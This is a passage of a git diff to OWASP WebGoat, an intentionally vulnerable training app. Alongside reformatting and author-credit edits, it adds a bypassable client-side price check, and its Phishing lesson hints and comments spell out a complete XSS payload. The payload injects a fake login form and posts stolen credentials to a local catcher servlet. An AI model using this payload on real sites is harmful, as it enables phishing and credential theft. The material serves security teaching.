diff --git a/ webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/BlindSqlInjection.java b/ webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/BlindSqlInjection.java
index 1ef676b4b..c67d55230 100644
--- a/ webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/BlindSqlInjection.java	
+++ b/ webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/BlindSqlInjection.java	
@@ -46,7 +46,7 @@ import org.owasp.webgoat.session.WebSession;
  * For details, please see http://code.google.com/p/webgoat/
  * 
  * @author Chuck Willis <a href="http://www.securityfoundry.com">Chuck's web
- *         site</a> (this lesson is heavily based on Jeff Williams' SQL
+ *         site</a> (this lesson is heavily based on Bruce Mayhews' SQL
  *         Injection lesson
  * @created January 14, 2005
  */
diff --git a/ webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/DOS_Login.java b/ webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/DOS_Login.java
index 3e465fc79..1bcb3b684 100644
--- a/ webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/DOS_Login.java	
+++ b/ webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/DOS_Login.java	
@@ -53,8 +53,8 @@ import org.owasp.webgoat.session.ParameterNotFoundException;
  * 
  * For details, please see http://code.google.com/p/webgoat/
  *
- * @author     Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
- * @created    October 28, 2003
+ * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
+ * @created October 28, 2003
  */
 public class DOS_Login extends LessonAdapter
 {
diff --git a/ webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/HiddenFieldTampering.java b/ webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/HiddenFieldTampering.java
index 55f0c15ef..8d11272b3 100644
--- a/ webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/HiddenFieldTampering.java	
+++ b/ webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/HiddenFieldTampering.java	
@@ -2,9 +2,11 @@ package org.owasp.webgoat.lessons;
 
 import java.util.ArrayList;
 import java.util.List;
+import java.util.regex.Pattern;
 
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
+import org.apache.ecs.StringElement;
 import org.apache.ecs.html.A;
 import org.apache.ecs.html.B;
 import org.apache.ecs.html.BR;
@@ -48,191 +50,193 @@ import org.owasp.webgoat.session.WebSession;
  * for free software projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
- * @author     Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
- * @created    October 28, 2003
- */
+ * 
+ * @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
+ * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
+ * @created October 28, 2003
+*/
 public class HiddenFieldTampering extends LessonAdapter
 {
-	public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0));
-	
-    private final static String PRICE = "Price";
+	public final static A ASPECT_LOGO =
+			new A().setHref("http://www.aspectsecurity.com").addElement(
+																		new IMG("images/logos/aspect.jpg")
+																				.setAlt("Aspect Security").setBorder(0)
+																				.setHspace(0).setVspace(0));
 
-    private final static String PRICE_TV = "2999.99";
+	private final static String PRICE = "Price";
 
-    private final static String PRICE_TV_HACKED = "9.99";
+	private final static String PRICE_TV = "2999.99";
 
+	private final static String PRICE_TV_HACKED = "9.99";
 
-    /**
-     *  Constructor for the HiddenFieldScreen object
-     */
-    public HiddenFieldTampering()
-    {}
+	String regex = "^" + PRICE_TV + "$";   // obviously the "." will match any char - any interesting exploit!
+	Pattern pattern1 = Pattern.compile(regex);
+	String lineSep = System.getProperty("line.separator");
+	String script =
+			"<SCRIPT>"  + lineSep + "regex=/" + regex + "/;" + "function validate() { " + lineSep
+					+ "if (!regex.test(document.form." + PRICE + ".value)) {alert('Data tampering is disallowed'); "
+					+" document.form." + PRICE + ".value = " + PRICE_TV + ";}"
+					+ lineSep + "else document.form.submit();" + lineSep + "} " + lineSep + "</SCRIPT>" + lineSep;
 
-
-    /**
-     *  Description of the Method
-     *
-     * @param  s  Description of the Parameter
-     * @return    Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {
-	ElementContainer ec = new ElementContainer();
-
-	try
+	/**
+	 * Constructor for the HiddenFieldScreen object
+	 */
+	public HiddenFieldTampering()
 	{
-	    String price = s.getParser().getRawParameter(PRICE, PRICE_TV);
-	    float quantity = s.getParser().getFloatParameter("QTY", 1.0f);
-	    float total = quantity * Float.parseFloat(price);
-
-	    if (price.equals(PRICE_TV))
-	    {
-		ec.addElement(new Center().addElement(new H1()
-			.addElement("Shopping Cart ")));
-		ec.addElement(new BR());
-		Table t = new Table().setCellSpacing(0).setCellPadding(2)
-			.setBorder(1).setWidth("90%").setAlign("center");
-
-		if (s.isColor())
-		{
-		    t.setBorder(1);
-		}
-
-		TR tr = new TR();
-		tr.addElement(new TH().addElement(
-			"Shopping Cart Items -- To Buy Now").setWidth("80%"));
-		tr.addElement(new TH().addElement("Price:").setWidth("10%"));
-		tr.addElement(new TH().addElement("Quantity:").setWidth("3%"));
-		tr.addElement(new TH().addElement("Total").setWidth("7%"));
-		t.addElement(tr);
-
-		tr = new TR();
-		tr.addElement(new TD()
-			.addElement("56 inch HDTV (model KTV-551)"));
-		tr.addElement(new TD().addElement(PRICE_TV).setAlign("right"));
-		tr.addElement(new TD().addElement(
-			new Input(Input.TEXT, "QTY", 1)).setAlign("right"));
-		tr.addElement(new TD().addElement("$" + total));
-		t.addElement(tr);
-
-		ec.addElement(t);
-
-		t = new Table().setCellSpacing(0).setCellPadding(2)
-			.setBorder(0).setWidth("90%").setAlign("center");
-
-		if (s.isColor())
-		{
-		    t.setBorder(1);
-		}
-
-		ec.addElement(new BR());
-		tr = new TR();
-		tr.addElement(new TD()
-			.addElement("The total charged to your credit card:"));
-		tr.addElement(new TD().addElement("$" + total));
-		tr.addElement(new TD().addElement(ECSFactory
-			.makeButton("Update Cart")));
-		tr.addElement(new TD().addElement(ECSFactory
-			.makeButton("Purchase")));
-		t.addElement(tr);
-
-		ec.addElement(t);
-
-		Input input = new Input(Input.HIDDEN, PRICE, PRICE_TV);
-		ec.addElement(input);
-		ec.addElement(new BR());
-
-	    }
-	    else
-	    {
-		if (!price.toString().equals(PRICE_TV))
-		{
-		    makeSuccess(s);
-		}
-
-		ec.addElement(new P().addElement("Your total price is:"));
-		ec.addElement(new B("$" + total));
-		ec.addElement(new BR());
-		ec
-			.addElement(new P()
-				.addElement("This amount will be charged to your credit card immediately."));
-	    }
-	}
-	catch (Exception e)
-	{
-	    s.setMessage("Error generating " + this.getClass().getName());
-	    e.printStackTrace();
 	}
 
-	return (ec);
-    }
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	protected Element createContent(WebSession s)
+	{
+		ElementContainer ec = new ElementContainer();
+		ec.addElement(new StringElement(script));
+		float quantity;
+		float total;
+		String price = PRICE_TV;
+		try
+		{
+			price = s.getParser().getRawParameter(PRICE, PRICE_TV);
+			quantity = s.getParser().getFloatParameter("QTY", 1.0f);
+			total = quantity * Float.parseFloat(price);
+		}
+		catch (Exception e)
+		{
+			s.setMessage("Invaild data " + this.getClass().getName());
+			price = PRICE_TV;
+			quantity = 1.0f;
+			total = quantity * Float.parseFloat(PRICE_TV);
 
+		}
 
-    /**
-     *  DOCUMENT ME!
-     *
-     * @return    DOCUMENT ME!
-     */
-    protected Category getDefaultCategory()
-    {
-	return Category.UNVALIDATED_PARAMETERS;
-    }
+		if (price.equals(PRICE_TV))
+		{
+			ec.addElement(new Center().addElement(new H1().addElement("Shopping Cart ")));
+			ec.addElement(new BR());
+			Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("90%").setAlign("center");
 
+			if (s.isColor())
+			{
+				t.setBorder(1);
+			}
 
-    /**
-     *  Gets the hints attribute of the HiddenFieldScreen object
-     *
-     * @return    The hints value
-     */
-    protected List<String> getHints(WebSession s)
-    {
-	List<String> hints = new ArrayList<String>();
-	hints
-		.add("This application is using hidden fields to transmit price information to the server.");
-	hints
-		.add("Use a program to intercept and change the value in the hidden field.");
-	hints
-		.add("Use <A href=\"http://www.owasp.org/development/webscarab\">WebScarab</A> to change the price of the TV from "
-			+ PRICE_TV + " to " + PRICE_TV_HACKED + ".");
+			TR tr = new TR();
+			tr.addElement(new TH().addElement("Shopping Cart Items -- To Buy Now").setWidth("80%"));
+			tr.addElement(new TH().addElement("Price:").setWidth("10%"));
+			tr.addElement(new TH().addElement("Quantity:").setWidth("3%"));
+			tr.addElement(new TH().addElement("Total").setWidth("7%"));
+			t.addElement(tr);
 
-	return hints;
-    }
+			tr = new TR();
+			tr.addElement(new TD().addElement("56 inch HDTV (model KTV-551)"));
+			tr.addElement(new TD().addElement(PRICE_TV).setAlign("right"));
+			tr.addElement(new TD().addElement(new Input(Input.TEXT, "QTY", 1)).setAlign("right"));
+			tr.addElement(new TD().addElement("$" + total));
+			t.addElement(tr);
 
+			ec.addElement(t);
 
-    /**
-     *  Gets the instructions attribute of the HiddenFieldTampering object
-     *
-     * @return    The instructions value
-     */
-    public String getInstructions(WebSession s)
-    {
-	String instructions = "Try to purchase the HDTV for less than the purchase price, if you have not done so already.";
+			t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
 
-	return (instructions);
-    }
+			if (s.isColor())
+			{
+				t.setBorder(1);
+			}
 
-    private final static Integer DEFAULT_RANKING = new Integer(50);
+			ec.addElement(new BR());
+			tr = new TR();
+			tr.addElement(new TD().addElement("The total charged to your credit card:"));
+			tr.addElement(new TD().addElement("$" + total));
+			tr.addElement(new TD().addElement(ECSFactory.makeButton("Update Cart")));
+			tr.addElement(new TD().addElement(ECSFactory.makeButton("Purchase", "validate()")));
+			t.addElement(tr);
 
+			ec.addElement(t);
 
-    protected Integer getDefaultRanking()
-    {
-	return DEFAULT_RANKING;
-    }
+			Input input = new Input(Input.HIDDEN, PRICE, PRICE_TV);
+			ec.addElement(input);
+			ec.addElement(new BR());
 
+		} else
+		{
+			if (!price.toString().equals(PRICE_TV))
+			{
+				makeSuccess(s);
+			}
 
-    /**
-     *  Gets the title attribute of the HiddenFieldScreen object
-     *
-     * @return    The title value
-     */
-    public String getTitle()
-    {
-	return ("Exploit Hidden Fields");
-    }
-    
-    public Element getCredits()
-    {
-    	return super.getCustomCredits("", ASPECT_LOGO);
-    }
+			ec.addElement(new P().addElement("Your total price is:"));
+			ec.addElement(new B("$" + total));
+			ec.addElement(new BR());
+			ec.addElement(new P().addElement("This amount will be charged to your credit card immediately."));
+		}
+
+		return (ec);
+	}
+
+	/**
+	 * DOCUMENT ME!
+	 * 
+	 * @return DOCUMENT ME!
+	 */
+	protected Category getDefaultCategory()
+	{
+		return Category.UNVALIDATED_PARAMETERS;
+	}
+
+	/**
+	 * Gets the hints attribute of the HiddenFieldScreen object
+	 * 
+	 * @return The hints value
+	 */
+	protected List<String> getHints(WebSession s)
+	{
+		List<String> hints = new ArrayList<String>();
+		hints.add("This application is using hidden fields to transmit price information to the server.");
+		hints.add("Use a program to intercept and change the value in the hidden field.");
+		hints
+				.add("Use <A href=\"http://www.owasp.org/development/webscarab\">WebScarab</A> to change the price of the TV from "
+					 + PRICE_TV + " to " + PRICE_TV_HACKED + ".");
+
+		return hints;
+	}
+
+	/**
+	 * Gets the instructions attribute of the HiddenFieldTampering object
+	 * 
+	 * @return The instructions value
+	 */
+	public String getInstructions(WebSession s)
+	{
+		String instructions =
+				"Try to purchase the HDTV for less than the purchase price, if you have not done so already.";
+
+		return (instructions);
+	}
+
+	private final static Integer DEFAULT_RANKING = new Integer(50);
+
+	protected Integer getDefaultRanking()
+	{
+		return DEFAULT_RANKING;
+	}
+
+	/**
+	 * Gets the title attribute of the HiddenFieldScreen object
+	 * 
+	 * @return The title value
+	 */
+	public String getTitle()
+	{
+		return ("Exploit Hidden Fields");
+	}
+
+	public Element getCredits()
+	{
+		return super.getCustomCredits("", ASPECT_LOGO);
+	}
 }
diff --git a/ webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/HttpBasics.java b/ webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/HttpBasics.java
index 9a96b453b..8836562c8 100644
--- a/ webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/HttpBasics.java	
+++ b/ webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/HttpBasics.java	
@@ -39,8 +39,8 @@ import org.owasp.webgoat.session.WebSession;
  * 
  * For details, please see http://code.google.com/p/webgoat/
  *
- * @author     Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
- * @created    October 28, 2003
+ * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
+ * @created October 28, 2003
  */
 public class HttpBasics extends LessonAdapter
 {
diff --git a/ webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/Phishing.java b/ webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/Phishing.java
index a9d1d2eae..edaa77c86 100644
--- a/ webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/Phishing.java	
+++ b/ webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/Phishing.java	
@@ -48,235 +48,251 @@ import org.owasp.webgoat.session.WebSession;
  * for free software projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
- * @author     Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
- * @created    March 13, 2007
+ * 
+ * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
+ * @created March 13, 2007
  */
 public class Phishing extends LessonAdapter
 {
-	
-    /**
-     *  Description of the Field
-     */
-    protected final static String SEARCH = "Username";
+
+	/**
+	 * Description of the Field
+	 */
+	protected final static String SEARCH = "Username";
 	private String searchText;
 
-
-    /**
-     *  Description of the Method
-     *
-     * @param  s  Description of the Parameter
-     * @return    Description of the Return Value
-     */
-    private boolean postedCredentials(WebSession s)
-    {
-		String postedToCookieCatcher = getLessonTracker(s).getLessonProperties()
-		.getProperty(Catcher.PROPERTY, Catcher.EMPTY_STRING);
-		
-	//<START_OMIT_SOURCE>
-	return (!postedToCookieCatcher.equals(Catcher.EMPTY_STRING));
-	//<END_OMIT_SOURCE>
-    }
-
-
-    /**
-     *  Description of the Method
-     *
-     * @param  s  Description of the Parameter
-     * @return    Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {
-	ElementContainer ec = new ElementContainer();
-
-	try
-	{
-		searchText = s.getParser().getRawParameter(SEARCH,"");
-		//<START_OMIT_SOURCE>
-	    //<END_OMIT_SOURCE>
-
-		ec.addElement(makeSearch(s));
-		if (postedCredentials(s))
-	    {
-			makeSuccess(s);
-	    }
-	}
-	catch (Exception e)
-	{
-	    s.setMessage("Error generating " + this.getClass().getName());
-	}
-
-	return (ec);
-    }
-
-
-    protected Element makeSearch(WebSession s)
-    {
-	ElementContainer ec = new ElementContainer();
-
-	ec.addElement(new H1().addElement("WebGoat Search "));
-	Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0)
-		.setAlign("center");
-
-	TR tr = new TR();
-	tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
-	t.addElement(tr);
-	if (s.isColor())
-	{
-	    t.setBorder(1);
-	}
-
-	tr = new TR();
-	tr
-		.addElement(new TH()
-			.addElement(
-				"This facility will search the WebGoat source.")
-			.setColSpan(2).setAlign("center"));
-	t.addElement(tr);
-
-	tr = new TR();
-	tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
-	t.addElement(tr);
-
-	TR row1 = new TR();
-	row1.addElement(new TD(new B(new StringElement("Search: "))).setAlign("right"));
-
-	Input input1 = new Input(Input.TEXT, SEARCH, searchText);
-	row1.addElement(new TD(input1).setAlign("left"));
-	t.addElement(row1);
-
-	Element b = ECSFactory.makeButton("Search");
-	t.addElement(new TR(new TD(b).setColSpan(2)).setAlign("center"));
-	ec.addElement(t);
-	
-	if (!searchText.equals(""))
-	{
-		ec.addElement(new BR());
-		ec.addElement(new HR());
-		ec.addElement(new BR());
-		ec.addElement(new StringElement("Results for: " + searchText));
-		ec.addElement(new Comment("Search results"));
-		ec.addElement(new BR());
-		ec.addElement(new BR());
-		ec.addElement(new B(new StringElement("No results were found.")));
-		ec.addElement(new Comment("End of Search results"));
-	}
-
-	return (ec);
-    }
-
-
-    /**
-     *  Gets the hints attribute of the CluesScreen object
-     *
-     * @return    The hints value
-     */
-    protected List<String> getHints(WebSession s)
-    {
-	List<String> hints = new ArrayList<String>();
-	hints
-		.add("Try adding HTML to the search field to create a fake authentication form.<BR>" +
-				"Try to make the form look official.");
-	hints.add("Try: <BR> " +
-			"password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2" +
-	"&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; " +
-	"name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; " +
-	"name = &quot;pass&quot;&gt;&lt;br&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
-	hints.add("Add functionality that can post a request, a button might work<BR><BR>" +
-			"After getting the button on the page, don't forget you will need to steal the credentials and post them to: <BR>" +
-			"http://localhost./WebGoat/capture/PROPERTY=yes&ADD_CREDENTIALS_HERE");		
-	hints.add("Try: <BR> " +
-			"&lt;input type=&quot;submit&quot; name=&quot;login&quot; " +
-	"value=&quot;login&quot;&gt;"+
-	"<BR><BR>Solution for this hint:<BR><BR>" +
-			"password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2" +
-	"&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; " +
-	"name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; " +
-	"name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; " +
-	"value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
-	hints.add("Make the button perform an action on submit, <BR>" +
-			"adding an onclick=\"hack()\" might work<BR>"+
-			"Don't forget to add the hack() javascript function" +
-			"<BR><BR>Solution for this hint:<BR><BR>" +
-			"password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2" +
-			"&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; " +
-			"name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; " +
-			"name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; " +
-			"value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
-	hints.add("You need to create the hack() function.  This function will pull the credentials from the " +
-			"webpage and post them to the WebGoat catcher servlet. <BR>" +
-			"<BR> Some useful code snippets:<UL>" +
-			"<LI>doucument.forms[0].user.value - will access the user field" +
-			"<LI>XssImage = new Image(); XssImage.src=SOME_URL = will perform a post" +
-			"<LI>javascript string concatentation uses a \"+\" </UL>" +
-			"<BR><BR>Solution for this hint():<BR><BR>" +
-			"password&lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen." +
-			"\nUser Name = &quot; + document.forms(0).user.value + &quot;\nPassword = &quot; +  document.forms(0).pass.value); " +
-			"XSSImage=new Image; XSSImage.src=&quot;http://localhost./WebGoat/catcher?PROPERTY=yes&amp;user=&quot;+" +
-			"document.forms(0).user.value + &quot;&amp;password=&quot; + document.forms(0).pass.value + &quot;&quot;;}" +
-			"&lt;/script&gt;");
-	hints.add("Complete solution for this lesson:<BR><BR>" +
-	"password&lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen." +
-	"\nUser Name = &quot; + document.forms(0).user.value + &quot;\nPassword = &quot; +  document.forms(0).pass.value); " +
-	"XSSImage=new Image; XSSImage.src=&quot;http://localhost./WebGoat/catcher?PROPERTY=yes&amp;user=&quot;+" +
-	"document.forms(0).user.value + &quot;&amp;password=&quot; + document.forms(0).pass.value + &quot;&quot;;}" +
-	"&lt;/script&gt;&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2" +
-	"&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; " +
-	"name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; " +
-	"name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; " +
-	"value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
 	/**
-	 * password<script>function hack(){ alert("Had this been a real attack... Your credentials were just stolen.\nUser Name = " + document.forms(0).user.value + "\nPassword = " +  document.forms(0).pass.value); XSSImage=new Image; XSSImage.src="http://localhost./WebGoat/catcher?PROPERTY=yes&user="+document.forms(0).user.value + "&password=" + document.forms(0).pass.value + "";}</script><form><br><br><HR><H3>This feature requires account login:</H2><br><br>Enter Username:<br><input type="text" id="user" name="user"><br>Enter Password:<br><input type="password" name = "pass"><br><input type="submit" name="login" value="login" onclick="hack()"></form><br><br><HR> <!--
+	 * Description of the Method
 	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
 	 */
-	return hints;
-    }
-    /**
-     *  Gets the instructions attribute of the XssSearch object
-     *
-     * @return    The instructions value
-     */
-    public String getInstructions(WebSession s)
-    {
-	String instructions = "This lesson is an example of how a website might support a phishing attack<BR><BR>" +
-		"Below is an example of a standard search feature.<br>" +
-		"Using XSS and HTML insertion, your goal is to: <UL>" +
-		"<LI>Insert html to that requests credentials" +
-		"<LI>Add javascript to actually collect the credentials" +
-		"<LI>Post the credentials to http://localhost./WebGoat/catcher?PROPERTY=yes...</UL> " +
-		"To pass this lesson, the credentials must be posted to the catcher servlet.<BR>";
+	private boolean postedCredentials(WebSession s)
+	{
+		String postedToCookieCatcher =
+				getLessonTracker(s).getLessonProperties().getProperty(Catcher.PROPERTY, Catcher.EMPTY_STRING);
 
-	return (instructions);
-    }
+		// <START_OMIT_SOURCE>
+		return (!postedToCookieCatcher.equals(Catcher.EMPTY_STRING));
+		// <END_OMIT_SOURCE>
+	}
 
-    private final static Integer DEFAULT_RANKING = new Integer(30);
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	protected Element createContent(WebSession s)
+	{
+		ElementContainer ec = new ElementContainer();
 
+		try
+		{
+			searchText = s.getParser().getRawParameter(SEARCH, "");
+			// <START_OMIT_SOURCE>
+			// <END_OMIT_SOURCE>
 
-    protected Integer getDefaultRanking()
-    {
-	return DEFAULT_RANKING;
-    }
+			ec.addElement(makeSearch(s));
+			if (postedCredentials(s))
+			{
+				makeSuccess(s);
+			}
+		}
+		catch (Exception e)
+		{
+			s.setMessage("Error generating " + this.getClass().getName());
+		}
 
+		return (ec);
+	}
 
-    /**
-     *  Gets the category attribute of the FailOpenAuthentication object
-     *
-     * @return    The category value
-     */
-    protected Category getDefaultCategory()
-    {
-	return Category.XSS;
-    }
+	protected Element makeSearch(WebSession s)
+	{
+		ElementContainer ec = new ElementContainer();
 
+		ec.addElement(new H1().addElement("WebGoat Search "));
+		Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setAlign("center");
+
+		TR tr = new TR();
+		tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
+		t.addElement(tr);
+		if (s.isColor())
+		{
+			t.setBorder(1);
+		}
+
+		tr = new TR();
+		tr.addElement(new TH().addElement("This facility will search the WebGoat source.").setColSpan(2)
+				.setAlign("center"));
+		t.addElement(tr);
+
+		tr = new TR();
+		tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
+		t.addElement(tr);
+
+		TR row1 = new TR();
+		row1.addElement(new TD(new B(new StringElement("Search: "))).setAlign("right"));
+
+		Input input1 = new Input(Input.TEXT, SEARCH, searchText);
+		row1.addElement(new TD(input1).setAlign("left"));
+		t.addElement(row1);
+
+		Element b = ECSFactory.makeButton("Search");
+		t.addElement(new TR(new TD(b).setColSpan(2)).setAlign("center"));
+		ec.addElement(t);
+
+		if (!searchText.equals(""))
+		{
+			ec.addElement(new BR());
+			ec.addElement(new HR());
+			ec.addElement(new BR());
+			ec.addElement(new StringElement("Results for: " + searchText));
+			ec.addElement(new Comment("Search results"));
+			ec.addElement(new BR());
+			ec.addElement(new BR());
+			ec.addElement(new B(new StringElement("No results were found.")));
+			ec.addElement(new Comment("End of Search results"));
+		}
+
+		return (ec);
+	}
+
+	/**
+	 * Gets the hints attribute of the CluesScreen object
+	 * 
+	 * @return The hints value
+	 */
+	protected List<String> getHints(WebSession s)
+	{
+		List<String> hints = new ArrayList<String>();
+		hints.add("Try adding HTML to the search field to create a fake authentication form.<BR>"
+				  + "Try to make the form look official.");
+		hints
+				.add("Try: <BR> "
+					 + "password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+					 + "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; "
+					 + "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
+					 + "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
+		hints
+				.add("Add functionality that can post a request, a button might work<BR><BR>"
+					 + "After getting the button on the page, don't forget you will need to steal the credentials and post them to: <BR>"
+					 + "http://localhost./WebGoat/capture/PROPERTY=yes&ADD_CREDENTIALS_HERE");
+		hints
+				.add("Try: <BR> "
+					 + "&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
+					 + "value=&quot;login&quot;&gt;"
+					 + "<BR><BR>Solution for this hint:<BR><BR>"
+					 + "password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+					 + "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; "
+					 + "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
+					 + "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
+					 + "value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
+		hints
+				.add("Make the button perform an action on submit, <BR>"
+					 + "adding an onclick=\"hack()\" might work<BR>"
+					 + "Don't forget to add the hack() javascript function"
+					 + "<BR><BR>Solution for this hint:<BR><BR>"
+					 + "password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+					 + "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; "
+					 + "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
+					 + "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
+					 + "value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
+		hints
+				.add("You need to create the hack() function.  This function will pull the credentials from the "
+					 + "webpage and post them to the WebGoat catcher servlet. <BR>"
+					 + "<BR> Some useful code snippets:<UL>"
+					 + "<LI>doucument.forms[0].user.value - will access the user field"
+					 + "<LI>XssImage = new Image(); XssImage.src=SOME_URL = will perform a post"
+					 + "<LI>javascript string concatentation uses a \"+\" </UL>"
+					 + "<BR><BR>Solution for this hint():<BR><BR>"
+					 + "password&lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen."
+					 + "\nUser Name = &quot; + document.forms(0).user.value + &quot;\nPassword = &quot; +  document.forms(0).pass.value); "
+					 + "XSSImage=new Image; XSSImage.src=&quot;http://localhost./WebGoat/catcher?PROPERTY=yes&amp;user=&quot;+"
+					 + "document.forms(0).user.value + &quot;&amp;password=&quot; + document.forms(0).pass.value + &quot;&quot;;}"
+					 + "&lt;/script&gt;");
+		hints
+				.add("Complete solution for this lesson:<BR><BR>"
+					 + "password&lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen."
+					 + "\nUser Name = &quot; + document.forms(0).user.value + &quot;\nPassword = &quot; +  document.forms(0).pass.value); "
+					 + "XSSImage=new Image; XSSImage.src=&quot;http://localhost./WebGoat/catcher?PROPERTY=yes&amp;user=&quot;+"
+					 + "document.forms(0).user.value + &quot;&amp;password=&quot; + document.forms(0).pass.value + &quot;&quot;;}"
